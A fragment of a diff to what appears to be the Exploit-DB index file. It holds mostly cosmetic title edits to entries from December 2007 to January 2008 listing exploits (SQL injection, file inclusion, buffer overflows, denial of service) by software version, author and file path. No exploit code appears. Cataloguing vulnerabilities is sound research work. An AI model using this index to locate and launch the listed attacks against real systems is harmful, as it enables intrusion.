Woo-Chi",windows,dos,0 4683,platforms/windows/dos/4683.py,"RealPlayer 11 - Malformed AU File Denial of Service",2007-12-01,NtWaK0,windows,dos,0 4684,platforms/php/webapps/4684.txt,"tellmatic 1.0.7 - Multiple Remote File Inclusion",2007-12-01,ShAy6oOoN,php,webapps,0 4685,platforms/php/webapps/4685.txt,"Rayzz Script 2.0 - Remote File Inclusion / Local File Inclusion",2007-12-01,Crackers_Child,php,webapps,0 4686,platforms/php/webapps/4686.txt,"phpBB Garage 1.2.0 Beta3 - SQL Injection",2007-12-03,maku234,php,webapps,0 4687,platforms/asp/webapps/4687.htm,"Snitz Forums 2000 - Active.asp SQL Injection",2007-12-03,BugReport.IR,asp,webapps,0 4688,platforms/windows/dos/4688.html,"VLC 0.86 < 0.86d - ActiveX Remote Bad Pointer Initialization (PoC)",2007-12-04,"Ricardo Narvaja",windows,dos,0 -4689,platforms/osx/dos/4689.c,"Apple Mac OSX xnu 1228.0 - mach-o Local Kernel Denial of Service (PoC)",2007-12-04,mu-b,osx,dos,0 -4690,platforms/osx/dos/4690.c,"Apple Mac OSX 10.5.0 - (leopard) vpnd Remote Denial of Service (PoC)",2007-12-04,mu-b,osx,dos,0 +4689,platforms/osx/dos/4689.c,"Apple Mac OS X xnu 1228.0 - mach-o Local Kernel Denial of Service (PoC)",2007-12-04,mu-b,osx,dos,0 +4690,platforms/osx/dos/4690.c,"Apple Mac OS X 10.5.0 (Leopard) - vpnd Remote Denial of Service (PoC)",2007-12-04,mu-b,osx,dos,0 4691,platforms/php/webapps/4691.txt,"Mambo/Joomla Component rsgallery 2.0b5 - 'catid' SQL Injection",2007-12-05,K-159,php,webapps,0 4692,platforms/hardware/dos/4692.pl,"Cisco Phone 7940 - Remote Denial of Service",2007-12-05,MADYNES,hardware,dos,0 4693,platforms/php/webapps/4693.txt,"SineCMS 2.3.4 - Calendar SQL Injection",2007-12-05,KiNgOfThEwOrLd,php,webapps,0 -4694,platforms/php/webapps/4694.txt,"ezContents 1.4.5 - (index.php link) Remote File Disclosure",2007-12-05,p4imi0,php,webapps,0 -4695,platforms/php/webapps/4695.txt,"Wordpress Plugin PictPress 0.91 - Remote File Disclosure",2007-12-05,GoLd_M,php,webapps,0 +4694,platforms/php/webapps/4694.txt,"EZContents 1.4.5 - (index.php link) Remote File Disclosure",2007-12-05,p4imi0,php,webapps,0 +4695,platforms/php/webapps/4695.txt,"WordPress Plugin PictPress 0.91 - Remote File Disclosure",2007-12-05,GoLd_M,php,webapps,0 4696,platforms/php/webapps/4696.txt,"SerWeb 2.0.0 dev1 2007-02-20 - Multiple Remote File Inclusion / Local File Inclusion Vulnerabilities",2007-12-06,GoLd_M,php,webapps,0 4697,platforms/asp/webapps/4697.txt,"MWOpen E-Commerce - leggi_commenti.asp SQL Injection",2007-12-06,KiNgOfThEwOrLd,asp,webapps,0 4698,platforms/linux/local/4698.c,"Send ICMP Nasty Garbage (sing) - Append File Logrotate Exploit",2007-12-06,bannedit,linux,local,0 4699,platforms/windows/remote/4699.txt,"firefly media server (mt-daapd) 2.4.1 / svn 1699 - Multiple Vulnerabilities",2007-12-07,"Luigi Auriemma",windows,remote,0 4700,platforms/windows/remote/4700.txt,"simple httpd 1.38 - Multiple Vulnerabilities",2007-12-07,"Luigi Auriemma",windows,remote,0 4701,platforms/windows/local/4701.pl,"Media Player Classic 6.4.9 MP4 - File Stack Overflow",2007-12-08,"SYS 49152",windows,local,0 -4702,platforms/windows/local/4702.pl,"Windows Media Player 6.4 MP4 - File Stack Overflow (PoC)",2007-12-08,"SYS 49152",windows,local,0 +4702,platforms/windows/local/4702.pl,"Microsoft Windows Media Player 6.4 MP4 - File Stack Overflow (PoC)",2007-12-08,"SYS 49152",windows,local,0 4703,platforms/windows/local/4703.pl,"Nullsoft Winamp 5.32 - MP4 tags Stack Overflow",2007-12-08,"SYS 49152",windows,local,0 4704,platforms/php/webapps/4704.txt,"PolDoc CMS 0.96 - (download_file.php) File Disclosure",2007-12-08,GoLd_M,php,webapps,0 4705,platforms/php/webapps/4705.txt,"Flat PHP Board 1.2 - Multiple Vulnerabilities",2007-12-09,KiNgOfThEwOrLd,php,webapps,0 @@ -4365,10 +4366,10 @@ id,file,description,date,author,platform,type,port 4717,platforms/windows/dos/4717.py,"Simple HTTPD 1.41 - (/aux) Remote Denial of Service",2007-12-11,shinnai,windows,dos,0 4718,platforms/php/webapps/4718.rb,"SquirrelMail G/PGP Plugin - deletekey() Command Injection",2007-12-11,Backdoored,php,webapps,0 4719,platforms/php/webapps/4719.txt,"Mcms Easy Web Make - 'index.php template' Local File Inclusion",2007-12-11,MhZ91,php,webapps,0 -4720,platforms/windows/remote/4720.html,"HP Compaq Notebooks - ActiveX Remote Code Execution Exploit",2007-12-11,porkythepig,windows,remote,0 -4721,platforms/php/webapps/4721.txt,"Wordpress 2.3.1 - Charset SQL Injection",2007-12-11,"Abel Cheung",php,webapps,0 +4720,platforms/windows/remote/4720.html,"HP Compaq Notebooks - ActiveX Remote Code Execution",2007-12-11,porkythepig,windows,remote,0 +4721,platforms/php/webapps/4721.txt,"WordPress 2.3.1 - Charset SQL Injection",2007-12-11,"Abel Cheung",php,webapps,0 4722,platforms/php/webapps/4722.txt,"viart cms/shop/helpdesk 3.3.2 - Remote File Inclusion",2007-12-11,RoMaNcYxHaCkEr,php,webapps,0 -4723,platforms/osx/dos/4723.c,"Apple Mac OSX xnu 1228.0 - super_blob Local kernel Denial of Service (PoC)",2007-12-12,mu-b,osx,dos,0 +4723,platforms/osx/dos/4723.c,"Apple Mac OS X xnu 1228.0 - super_blob Local kernel Denial of Service (PoC)",2007-12-12,mu-b,osx,dos,0 4724,platforms/windows/remote/4724.py,"HP OpenView Network Node Manager 07.50 - CGI Remote Buffer Overflow Exploit",2007-12-12,muts,windows,remote,80 4725,platforms/php/webapps/4725.txt,"Fastpublish CMS 1.9999 - config[fsBase] Remote File Inclusion",2007-12-12,RoMaNcYxHaCkEr,php,webapps,0 4726,platforms/php/webapps/4726.txt,"CityWriter 0.9.7 - head.php Remote File Inclusion",2007-12-13,RoMaNcYxHaCkEr,php,webapps,0 @@ -4385,25 +4386,25 @@ id,file,description,date,author,platform,type,port 4737,platforms/php/webapps/4737.txt,"PHP Real Estate - 'fullnews.php id' SQL Injection",2007-12-14,t0pP8uZz,php,webapps,0 4738,platforms/php/webapps/4738.txt,"gf-3xplorer 2.4 - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities",2007-12-18,MhZ91,php,webapps,0 4739,platforms/php/webapps/4739.pl,"MOG-WebShop - 'index.php group' SQL Injection",2007-12-18,k1tk4t,php,webapps,0 -4740,platforms/php/webapps/4740.pl,"FreeWebshop 2.2.1 - Blind SQL Injection",2007-12-18,k1tk4t,php,webapps,0 +4740,platforms/php/webapps/4740.pl,"FreeWebShop 2.2.1 - Blind SQL Injection",2007-12-18,k1tk4t,php,webapps,0 4741,platforms/php/webapps/4741.txt,"MySpace Content Zone 3.x - Remote File Upload",2007-12-18,Don,php,webapps,0 4742,platforms/windows/dos/4742.py,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow (PoC)",2007-12-18,r4x,windows,dos,0 -4743,platforms/php/webapps/4743.pl,"FreeWebshop 2.2.7 - (cookie) Admin Password Grabber Exploit",2007-12-18,k1tk4t,php,webapps,0 -4744,platforms/hardware/remote/4744.txt,"rooter VDSL Device - (Goahead WEBSERVER) Disclosure",2007-12-18,NeoCoderz,hardware,remote,0 +4743,platforms/php/webapps/4743.pl,"FreeWebShop 2.2.7 - 'cookie' Admin Password Grabber Exploit",2007-12-18,k1tk4t,php,webapps,0 +4744,platforms/hardware/remote/4744.txt,"rooter VDSL Device - (Goahead WebServer) Disclosure",2007-12-18,NeoCoderz,hardware,remote,0 4745,platforms/windows/remote/4745.cpp,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow Exploit (MS07-065)",2007-12-18,axis,windows,remote,0 -4746,platforms/windows/remote/4746.html,"RavWare Software - .MAS Flic Control Remote Buffer Overflow",2007-12-18,shinnai,windows,remote,0 +4746,platforms/windows/remote/4746.html,"RavWare Software - '.MAS' Flic Control Remote Buffer Overflow",2007-12-18,shinnai,windows,remote,0 4747,platforms/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 - (ulang) Remote Command Execution Exploit",2007-12-18,rgod,windows,remote,0 -4748,platforms/windows/dos/4748.php,"SurgeMail 38k4 - webmail Host header Denial of Service",2007-12-18,rgod,windows,dos,0 +4748,platforms/windows/dos/4748.php,"Surgemail 38k4 - webmail Host header Denial of Service",2007-12-18,rgod,windows,dos,0 4749,platforms/windows/local/4749.c,"Rosoft Media Player 4.1.7 - '.m3u' Stack Overflow",2007-12-18,devcode,windows,local,0 4750,platforms/php/webapps/4750.txt,"PHPMyRealty 1.0.x - (search.php type) SQL Injection",2007-12-18,Koller,php,webapps,0 4751,platforms/windows/local/4751.pl,"jetAudio 7.0.5 COWON Media Center MP4 - Stack Overflow",2007-12-18,"SYS 49152",windows,local,0 4753,platforms/php/webapps/4753.txt,"Dokeos 1.8.4 - Arbitrary File Upload",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 4754,platforms/windows/remote/4754.pl,"3proxy 0.5.3g (Windows/x86) - logurl() Remote Buffer Overflow (Perl)",2007-12-18,"Marcin Kozlowski",windows,remote,3128 4755,platforms/php/webapps/4755.txt,"PhpMyDesktop/Arcade 1.0 Final - (phpdns_basedir) Remote File Inclusion",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 -4756,platforms/linux/local/4756.c,"Linux Kernel < 2.6.11.5 - Bluetooth Stack Privilege Escalation",2007-12-18,Backdoored,linux,local,0 +4756,platforms/linux/local/4756.c,"Linux Kernel < 2.6.11.5 - BlueTooth Stack Privilege Escalation",2007-12-18,Backdoored,linux,local,0 4757,platforms/windows/dos/4757.txt,"hp software update client 3.0.8.4 - Multiple Vulnerabilities",2007-12-19,porkythepig,windows,dos,0 4758,platforms/php/webapps/4758.txt,"xeCMS 1.x - (view.php list) Remote File Disclosure",2007-12-19,p4imi0,php,webapps,0 -4759,platforms/osx/local/4759.c,"Apple Mac OSX - mount_smbfs Stack Based Buffer Overflow",2007-12-19,"Subreption LLC.",osx,local,0 +4759,platforms/osx/local/4759.c,"Apple Mac OS X - mount_smbfs Stack Based Buffer Overflow",2007-12-19,"Subreption LLC.",osx,local,0 4760,platforms/windows/remote/4760.txt,"Microsoft Windows 2000 - AS SP4 Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0 4761,platforms/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Root Exploit",2007-12-21,eliteboy,multiple,remote,25 4762,platforms/php/webapps/4762.txt,"nicLOR CMS - 'sezione_news.php' SQL Injection",2007-12-21,x0kster,php,webapps,0 @@ -4426,7 +4427,7 @@ id,file,description,date,author,platform,type,port 4779,platforms/php/webapps/4779.php,"CuteNews 1.4.5 - Admin Password md5 Hash Fetching Exploit",2007-12-24,waraxe,php,webapps,0 4780,platforms/php/webapps/4780.txt,"ThemeSiteScript 1.0 - (index.php loadadminpage) Remote File Inclusion",2007-12-24,Koller,php,webapps,0 4781,platforms/php/webapps/4781.php,"Jupiter 1.1.5ex - Privilege Escalation",2007-12-24,BugReport.IR,php,webapps,0 -4782,platforms/php/webapps/4782.txt,"Agares PhpAutoVideo 2.21 - Remote / Local File Inclusion",2007-12-24,MhZ91,php,webapps,0 +4782,platforms/php/webapps/4782.txt,"Agares phpAutoVideo 2.21 - Remote / Local File Inclusion",2007-12-24,MhZ91,php,webapps,0 4783,platforms/php/webapps/4783.txt,"Joomla Component mosDirectory 2.3.2 - Remote File Inclusion",2007-12-24,ShockShadow,php,webapps,0 4784,platforms/windows/remote/4784.pl,"BadBlue 2.72 - PassThru Remote Buffer Overflow",2007-12-24,"Jacopo Cervini",windows,remote,80 4785,platforms/php/webapps/4785.txt,"TeamCalPro 3.1.000 - Multiple Remote / Local File Inclusion",2007-12-25,GoLd_M,php,webapps,0 @@ -4450,7 +4451,7 @@ id,file,description,date,author,platform,type,port 4804,platforms/php/webapps/4804.txt,"Hot or Not Clone by Jnshosts.com - Database Backup Dump",2007-12-28,RoMaNcYxHaCkEr,php,webapps,0 4805,platforms/php/webapps/4805.txt,"NoseRub 0.5.2 - Login SQL Injection",2007-12-28,"Felix Groebert",php,webapps,0 4806,platforms/windows/remote/4806.html,"Persits Software XUpload Control - AddFolder() Buffer Overflow",2007-12-28,Elazar,windows,remote,0 -4807,platforms/php/webapps/4807.php,"jPORTAL 2.3.1 & UserPatch - (forum.php) Remote Code Execution Exploit",2007-12-29,irk4z,php,webapps,0 +4807,platforms/php/webapps/4807.php,"jPORTAL 2.3.1 & UserPatch - 'forum.php' Remote Code Execution",2007-12-29,irk4z,php,webapps,0 4808,platforms/php/webapps/4808.txt,"Mihalism Multi Forum Host 3.0.x - Remote File Inclusion",2007-12-29,GoLd_M,php,webapps,0 4809,platforms/php/webapps/4809.txt,"CCMS 3.1 Demo - SQL Injection",2007-12-29,Pr0metheuS,php,webapps,0 4810,platforms/php/webapps/4810.txt,"CMS Made Simple 1.2.2 - (TinyMCE module) SQL Injection",2007-12-30,EgiX,php,webapps,0 @@ -4481,17 +4482,17 @@ id,file,description,date,author,platform,type,port 4835,platforms/php/webapps/4835.py,"WebPortal CMS 0.6-beta - Remote Password Change Exploit",2008-01-04,The:Paradox,php,webapps,0 4836,platforms/php/webapps/4836.txt,"samPHPweb - 'songinfo.php' SQL Injection",2008-01-05,BackDoor,php,webapps,0 4837,platforms/php/webapps/4837.pl,"ClipShare 2.6 - Remote User Password Change Exploit",2008-01-05,Pr0metheuS,php,webapps,0 -4838,platforms/php/webapps/4838.txt,"snetworks PHP classifieds 5.0 - Remote File Inclusion",2008-01-05,Crackers_Child,php,webapps,0 +4838,platforms/php/webapps/4838.txt,"snetworks PHP Classifieds 5.0 - Remote File Inclusion",2008-01-05,Crackers_Child,php,webapps,0 4839,platforms/windows/local/4839.pl,"CoolPlayer 2.17 - '.m3u' Stack Overflow",2008-01-05,Trancek,windows,local,0 4840,platforms/php/webapps/4840.php,"Tribisur 2.0 - SQL Injection",2008-01-05,x0kster,php,webapps,0 4841,platforms/php/webapps/4841.txt,"Invision Power Board 2.1.7 - ACTIVE Cross-Site Scripting / SQL Injection",2008-01-05,"Eugene Minaev",php,webapps,0 4842,platforms/php/webapps/4842.pl,"NetRisk 1.9.7 - (change_submit.php) Remote Password Change Exploit",2008-01-05,Cod3rZ,php,webapps,0 4843,platforms/php/webapps/4843.txt,"modx CMS 0.9.6.1 - Multiple Vulnerabilities",2008-01-05,BugReport.IR,php,webapps,0 -4844,platforms/php/webapps/4844.txt,"Wordpress Plugin Wp-FileManager 1.2 - Remote Upload",2008-01-06,Houssamix,php,webapps,0 +4844,platforms/php/webapps/4844.txt,"WordPress Plugin Wp-FileManager 1.2 - Remote Upload",2008-01-06,Houssamix,php,webapps,0 4845,platforms/php/webapps/4845.pl,"RunCMS Newbb_plus 0.92 - Client IP SQL Injection",2008-01-06,"Eugene Minaev",php,webapps,0 4846,platforms/php/webapps/4846.txt,"Uebimiau Web-Mail 2.7.10/2.7.2 - Remote File Disclosure",2008-01-06,"Eugene Minaev",php,webapps,0 4847,platforms/php/webapps/4847.txt,"XOOPS mod_gallery Zend_Hash_key + Extract - Remote File Inclusion",2008-01-06,"Eugene Minaev",php,webapps,0 -4848,platforms/asp/webapps/4848.txt,"portalapp 4.0 - (SQL Injection / Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities",2008-01-06,r3dm0v3,asp,webapps,0 +4848,platforms/asp/webapps/4848.txt,"PortalApp 4.0 - (SQL Injection / Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities",2008-01-06,r3dm0v3,asp,webapps,0 4849,platforms/php/webapps/4849.txt,"LoudBlog 0.6.1 - (parsedpage) Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0 4850,platforms/php/webapps/4850.txt,"Horde Web-Mail 3.x - (go.php) Remote File Disclosure",2008-01-06,"Eugene Minaev",php,webapps,0 4851,platforms/php/webapps/4851.txt,"CuteNews 1.1.1 - (html.php) Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0 @@ -4519,15 +4520,15 @@ id,file,description,date,author,platform,type,port 4873,platforms/windows/remote/4873.html,"Microsoft FoxServer - (vfp6r.dll 6.0.8862.0) ActiveX Command Execution",2008-01-09,shinnai,windows,remote,0 4874,platforms/windows/remote/4874.html,"Microsoft Rich Textbox Control 6.0 - (SP6) SaveFile() Insecure Method",2008-01-09,shinnai,windows,remote,0 4876,platforms/php/webapps/4876.txt,"Tuned Studios Templates - Local File Inclusion",2008-01-09,DSecRG,php,webapps,0 -4877,platforms/multiple/remote/4877.txt,"SAP MaxDB 7.6.03.07 - Pre-Authenticated Remote Command Execution Exploit",2008-01-09,"Luigi Auriemma",multiple,remote,7210 -4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server - Remote Pre-Authenticated Code Execution / Denial of Service (PoC)",2008-01-09,"Leon Juranic",multiple,dos,0 +4877,platforms/multiple/remote/4877.txt,"SAP MaxDB 7.6.03.07 - Pre-Authentication Remote Command Execution Exploit",2008-01-09,"Luigi Auriemma",multiple,remote,7210 +4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server - Remote Pre-Authentication Code Execution / Denial of Service (PoC)",2008-01-09,"Leon Juranic",multiple,dos,0 4879,platforms/php/webapps/4879.php,"Docebo 3.5.0.3 - (lib.regset.php) Command Execution Exploit",2008-01-09,EgiX,php,webapps,0 4880,platforms/php/webapps/4880.php,"DomPHP 0.81 - Remote Add Administrator Exploit",2008-01-10,j0j0,php,webapps,0 4881,platforms/solaris/dos/4881.c,"SunOS 5.10 - Remote ICMP Kernel Crash Exploit",2008-01-10,kingcope,solaris,dos,0 4882,platforms/php/webapps/4882.txt,"MTCMS 2.0 - SQL Injection",2008-01-10,"Virangar Security",php,webapps,0 4883,platforms/php/webapps/4883.txt,"DomPHP 0.81 - 'index.php' Remote File Inclusion",2008-01-10,Houssamix,php,webapps,0 4884,platforms/php/webapps/4884.php,"Evilsentinel 1.0.9 - (Multiple Vulnerabilities) Disable Exploit",2008-01-10,BlackHawk,php,webapps,0 -4885,platforms/windows/dos/4885.txt,"Quicktime Player 7.3.1.70 - (rtsp) Buffer Overflow",2008-01-10,"Luigi Auriemma",windows,dos,0 +4885,platforms/windows/dos/4885.txt,"QuickTime Player 7.3.1.70 - (rtsp) Buffer Overflow",2008-01-10,"Luigi Auriemma",windows,dos,0 4886,platforms/php/webapps/4886.pl,"iGaming CMS 1.3.1/1.5 - SQL Injection",2008-01-11,"Eugene Minaev",php,webapps,0 4887,platforms/php/webapps/4887.htm,"DigitalHive 2.0 RC2 - (user_id) SQL Injection",2008-01-11,j0j0,php,webapps,0 4888,platforms/php/webapps/4888.txt,"DomPHP 0.81 - (index.php cat) SQL Injection",2008-01-11,MhZ91,php,webapps,0 @@ -4540,15 +4541,15 @@ id,file,description,date,author,platform,type,port 4895,platforms/php/webapps/4895.txt,"ImageAlbum 2.0.0b2 - 'id' SQL Injection",2008-01-11,"Raw Security",php,webapps,0 4896,platforms/php/webapps/4896.pl,"0DayDB 2.3 - 'delete id' Remote Authentication Bypass Exploit",2008-01-11,Pr0metheuS,php,webapps,0 4897,platforms/php/webapps/4897.pl,"photokron 1.7 - (update script) Remote Database Disclosure Exploit",2008-01-11,Pr0metheuS,php,webapps,0 -4898,platforms/php/webapps/4898.txt,"Agares PhpAutoVideo 2.21 - (articlecat) SQL Injection (1)",2008-01-12,ka0x,php,webapps,0 +4898,platforms/php/webapps/4898.txt,"Agares phpAutoVideo 2.21 - 'articlecat' SQL Injection (1)",2008-01-12,ka0x,php,webapps,0 4899,platforms/php/webapps/4899.txt,"TaskFreak! 0.6.1 - SQL Injection",2008-01-12,TheDefaced,php,webapps,0 4900,platforms/asp/webapps/4900.txt,"ASP Photo Gallery 1.0 - Multiple SQL Injections",2008-01-12,trew,asp,webapps,0 -4901,platforms/php/webapps/4901.txt,"TutorialCMS 1.02 - (userName) SQL Injection",2008-01-12,ka0x,php,webapps,0 +4901,platforms/php/webapps/4901.txt,"TutorialCMS 1.02 - 'username' SQL Injection",2008-01-12,ka0x,php,webapps,0 4902,platforms/php/webapps/4902.txt,"minimal Gallery 0.8 - Remote File Disclosure",2008-01-13,Houssamix,php,webapps,0 4903,platforms/windows/remote/4903.html,"NUVICO DVR NVDV4 / PdvrAtl Module (PdvrAtl.DLL 1.0.1.25) - Buffer Overflow Exploit",2008-01-13,rgod,windows,remote,0 4904,platforms/php/webapps/4904.txt,"Binn SBuilder - (nid) Blind SQL Injection",2008-01-13,JosS,php,webapps,0 -4905,platforms/php/webapps/4905.pl,"Agares PhpAutoVideo 2.21 - (articlecat) SQL Injection (2)",2008-01-13,Pr0metheuS,php,webapps,0 -4906,platforms/windows/remote/4906.txt,"Quicktime Player 7.3.1.70 - rtsp Remote Buffer Overflow (PoC)",2008-01-14,"Luigi Auriemma",windows,remote,0 +4905,platforms/php/webapps/4905.pl,"Agares phpAutoVideo 2.21 - 'articlecat' SQL Injection (2)",2008-01-13,Pr0metheuS,php,webapps,0 +4906,platforms/windows/remote/4906.txt,"QuickTime Player 7.3.1.70 - RTSP Remote Buffer Overflow (PoC)",2008-01-14,"Luigi Auriemma",windows,remote,0 4907,platforms/php/webapps/4907.py,"X7 Chat 2.0.5 - 'day' SQL Injection",2008-01-14,nonroot,php,webapps,0 4908,platforms/php/webapps/4908.pl,"Xforum 1.4 - (topic) SQL Injection",2008-01-14,j0j0,php,webapps,0 4909,platforms/windows/remote/4909.html,"Macrovision FlexNet DownloadManager - Insecure Methods Exploit",2008-01-14,Elazar,windows,remote,0 @@ -4568,21 +4569,21 @@ id,file,description,date,author,platform,type,port 4923,platforms/windows/remote/4923.txt,"miniweb 0.8.19 - Multiple Vulnerabilities",2008-01-16,"Hamid Ebadi",windows,remote,0 4924,platforms/php/webapps/4924.php,"PixelPost 1.7 - Blind SQL Injection",2008-01-16,Silentz,php,webapps,0 4925,platforms/php/webapps/4925.txt,"PHP-RESIDENCE 0.7.2 - (Search) SQL Injection",2008-01-16,"Khashayar Fereidani",php,webapps,0 -4926,platforms/php/webapps/4926.pl,"Gradman 0.1.3 - (agregar_info.php) Local File Inclusion Exploit",2008-01-16,JosS,php,webapps,0 -4927,platforms/php/webapps/4927.php,"MyBulletinBoard (MyBB) 1.2.10 - Remote Code Execution Exploit",2008-01-16,Silentz,php,webapps,0 +4926,platforms/php/webapps/4926.pl,"Gradman 0.1.3 - (agregar_info.php) Local File Inclusion",2008-01-16,JosS,php,webapps,0 +4927,platforms/php/webapps/4927.php,"MyBulletinBoard (MyBB) 1.2.10 - Remote Code Execution",2008-01-16,Silentz,php,webapps,0 4928,platforms/php/webapps/4928.txt,"mybulletinboard (MyBB) 1.2.10 - Multiple Vulnerabilities",2008-01-16,waraxe,php,webapps,0 4929,platforms/php/webapps/4929.txt,"PHPEcho CMS 2.0 - 'id' SQL Injection",2008-01-17,Stack,php,webapps,0 4930,platforms/php/webapps/4930.txt,"Mini File Host 1.2 - (upload.php language) Local File Inclusion",2008-01-17,Scary-Boys,php,webapps,0 4931,platforms/windows/dos/4931.txt,"Crystal Reports XI Release 2 - (Enterprise Tree Control) ActiveX Buffer Overflow/Denial of Service",2008-01-17,shinnai,windows,dos,0 4932,platforms/windows/remote/4932.html,"Digital Data Communications - (RtspVaPgCtrl) Remote Buffer Overflow Exploit",2008-01-17,rgod,windows,remote,0 -4933,platforms/php/webapps/4933.pl,"AuraCMS 1.62 - (stat.php) Remote Code Execution Exploit",2008-01-18,k1tk4t,php,webapps,0 +4933,platforms/php/webapps/4933.pl,"AuraCMS 1.62 - (stat.php) Remote Code Execution",2008-01-18,k1tk4t,php,webapps,0 4934,platforms/windows/remote/4934.c,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow Exploit (dnsname)",2008-01-18,"Marcin Kozlowski",windows,remote,0 4935,platforms/bsd/dos/4935.c,"OpenBSD 4.2 - rtlabel_id2name() Local Null Pointer Dereference Denial of Service",2008-01-18,Hunger,bsd,dos,0 4936,platforms/php/webapps/4936.txt,"Gradman 0.1.3 - (info.php tabla) Local File Inclusion",2008-01-18,Syndr0me,php,webapps,0 4937,platforms/php/webapps/4937.txt,"Small Axe 0.3.1 - (linkbar.php cfile) Remote File Inclusion",2008-01-18,RoMaNcYxHaCkEr,php,webapps,0 4938,platforms/windows/local/4938.py,"Microsoft Visual Basic Enterprise Ed. 6 SP6 - '.dsr' File Handling Buffer Overflow Exploit",2008-01-18,shinnai,windows,local,0 -4939,platforms/php/webapps/4939.txt,"Wordpress Plugin WP-Forum 1.7.4 - SQL Injection",2008-01-19,"websec Team",php,webapps,0 -4940,platforms/php/webapps/4940.pl,"Mini File Host 1.2.1 - (upload.php language) Local File Inclusion Exploit",2008-01-20,shinmai,php,webapps,0 +4939,platforms/php/webapps/4939.txt,"WordPress Plugin WP-Forum 1.7.4 - SQL Injection",2008-01-19,"websec Team",php,webapps,0 +4940,platforms/php/webapps/4940.pl,"Mini File Host 1.2.1 - (upload.php language) Local File Inclusion",2008-01-20,shinmai,php,webapps,0 4941,platforms/hardware/remote/4941.txt,"Belkin Wireless G Plus MIMO Router F5D9230-4 - Authentication Bypass",2008-01-20,DarkFig,hardware,remote,0 4942,platforms/php/webapps/4942.txt,"TikiWiki < 1.9.9 - tiki-listmovies.php Directory Traversal",2008-01-20,Sha0,php,webapps,0 4943,platforms/php/webapps/4943.txt,"Frimousse 0.0.2 - explorerdir.php Local Directory Traversal",2008-01-20,Houssamix,php,webapps,0 @@ -4590,19 +4591,19 @@ id,file,description,date,author,platform,type,port 4945,platforms/php/webapps/4945.txt,"bloofox 0.3 - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-01-20,BugReport.IR,php,webapps,0 4946,platforms/windows/remote/4946.html,"Toshiba Surveillance - (MeIpCamX.dll 1.0.0.4) Remote Buffer Overflow Exploit",2008-01-20,rgod,windows,remote,0 4947,platforms/linux/remote/4947.c,"Axigen 5.0.2 - AXIMilter Remote Format String Exploit",2008-01-21,hempel,linux,remote,0 -4948,platforms/windows/remote/4948.txt,"Windows RSH daemon 1.8 - Remote Buffer Overflow",2008-01-21,prdelka,windows,remote,0 +4948,platforms/windows/remote/4948.txt,"Microsoft Windows RSH daemon 1.8 - Remote Buffer Overflow",2008-01-21,prdelka,windows,remote,0 4949,platforms/windows/remote/4949.txt,"Citadel SMTP 7.10 - Remote Overflow",2008-01-21,prdelka,windows,remote,25 4950,platforms/php/webapps/4950.php,"Coppermine Photo Gallery 1.4.10 - 'cpg1410_xek.php' SQL Injection",2008-01-21,bazik,php,webapps,0 4951,platforms/php/webapps/4951.txt,"Mooseguy Blog System 1.0 - (blog.php month) SQL Injection",2008-01-21,The_HuliGun,php,webapps,0 4952,platforms/php/webapps/4952.txt,"boastMachine 3.1 - (mail.php id) SQL Injection",2008-01-21,"Virangar Security",php,webapps,0 4953,platforms/php/webapps/4953.txt,"OZJournals 2.1.1 - 'id' File Disclosure",2008-01-21,shinmai,php,webapps,0 -4954,platforms/php/webapps/4954.txt,"IDM-OS 1.0 - (download.php fileName) File Disclosure",2008-01-21,MhZ91,php,webapps,0 +4954,platforms/php/webapps/4954.txt,"IDM-OS 1.0 - (download.php Filename) File Disclosure",2008-01-21,MhZ91,php,webapps,0 4955,platforms/php/webapps/4955.txt,"Lama Software 14.12.2007 - Multiple Remote File Inclusion",2008-01-21,QTRinux,php,webapps,0 -4956,platforms/php/webapps/4956.txt,"AlstraSoft Forum Pay Per Post Exchange 2.0 - SQL Injection",2008-01-21,t0pP8uZz,php,webapps,0 +4956,platforms/php/webapps/4956.txt,"Alstrasoft Forum Pay Per Post Exchange 2.0 - SQL Injection",2008-01-21,t0pP8uZz,php,webapps,0 4957,platforms/php/webapps/4957.txt,"MoinMoin 1.5.x - MOIND_ID cookie Bug Remote Exploit",2008-01-21,nonroot,php,webapps,0 4958,platforms/php/webapps/4958.txt,"aflog 1.01 - comments.php Cross-Site Scripting / SQL Injection",2008-01-22,shinmai,php,webapps,0 4959,platforms/windows/remote/4959.html,"HP Virtual Rooms WebHPVCInstall Control - Buffer Overflow",2008-01-22,Elazar,windows,remote,0 -4960,platforms/php/webapps/4960.txt,"Easysitenetwork Recipe - (categoryid) SQL Injection",2008-01-22,S@BUN,php,webapps,0 +4960,platforms/php/webapps/4960.txt,"Easysitenetwork Recipe - 'categoryId' SQL Injection",2008-01-22,S@BUN,php,webapps,0 4961,platforms/php/webapps/4961.php,"Coppermine Photo Gallery 1.4.14 - SQL Injection",2008-01-22,RST/GHC,php,webapps,0 4962,platforms/php/webapps/4962.pl,"SetCMS 3.6.5 - (setcms.org) Remote Command Execution Exploit",2008-01-22,RST/GHC,php,webapps,0 4963,platforms/php/webapps/4963.pl,"YaBB SE 1.5.5 - Remote Command Execution Exploit",2008-01-22,RST/GHC,php,webapps,0 @@ -4612,15 +4613,15 @@ id,file,description,date,author,platform,type,port 4967,platforms/windows/remote/4967.html,"Lycos FileUploader Control - ActiveX Remote Buffer Overflow",2008-01-22,Elazar,windows,remote,0 4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 - (index.php story) SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0 4969,platforms/php/webapps/4969.txt,"LulieBlog 1.02 - (voircom.php id) SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0 -4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums 9.07 - (sub) Remote Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0 